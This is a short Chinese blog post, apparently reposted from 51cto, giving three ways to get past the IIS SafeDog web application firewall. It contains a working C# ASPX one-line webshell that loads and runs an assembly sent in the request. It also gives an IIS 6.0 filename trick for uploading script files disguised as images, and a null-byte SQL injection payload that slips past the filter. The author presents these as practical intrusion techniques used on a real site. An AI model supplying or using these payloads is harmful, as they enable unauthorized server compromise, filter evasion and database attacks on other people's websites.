1、繞過IIS安全狗的一句話。
?前幾天測(cè)試一個(gè)網(wǎng)站。找到突破口之后，寫入webshell，但服務(wù)器上裝有IIS安全狗，平時(shí)常用的一句話或者shell都用不了。下面這段.net一句話可以突破。
?<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>連接端用cncert的aspx一句話客戶端。
?

2、IIS6.0解析漏洞遇到安全狗。
?文件名為http://www.web.com/sh3llc0de.asp;1.jpg。
?這樣的會(huì)被IIS安全狗果斷屏蔽。
?改成如下名稱,IIS6一樣會(huì)解析：
?www.web.com/;1.asp;1.jpg
?

3、安全狗的注入繞過。
?常用的如r00ts.asp?id=1 and 1=1 是會(huì)被安全狗屏蔽的。
?但如果：
?r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
?就可以成功繞過了。?
?

轉(zhuǎn)載于:https://blog.51cto.com/findyyy/1017826

總結(jié)

以上是生活随笔為你收集整理的突破安全狗防注入及上传的一些思路的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。